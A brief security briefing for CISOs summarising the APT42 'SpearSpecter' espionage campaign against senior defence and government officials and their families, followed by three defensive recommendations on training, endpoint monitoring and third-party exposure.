What happened
Iranian threat group APT42 launched a new espionage operation called SpearSpecter. The group used tailored social engineering to target senior officials and gained access through fake conference invitations. After a target clicked the link, the attackers installed a PowerShell backdoor and collected browser data, emails, and screenshots through cloud and messaging platforms.
Who is affected
The campaign focuses on senior defence and government officials. It also targets family members and close contacts, which increases the risk beyond corporate devices. Any organisation linked to government or defence work should consider this a relevant threat.
Why CISOs should care
The attackers rely on personalised messages, in-memory tools, and legitimate cloud services. These methods make detection harder and show that APT groups are expanding their reach by targeting people around high-value roles. This creates added risk for contractors, partners, and support teams who interact with sensitive government positions.
Three practical actions
-
Strengthen training for executives and high-risk staff. Include scenarios involving external invitations and impersonation attempts.
-
Improve endpoint monitoring for unusual PowerShell activity, in-memory tools, and traffic to platforms like Discord or Telegram.
-
Review exposure from third parties and family-linked devices. Enforce least privilege and stronger identity checks for external requests.
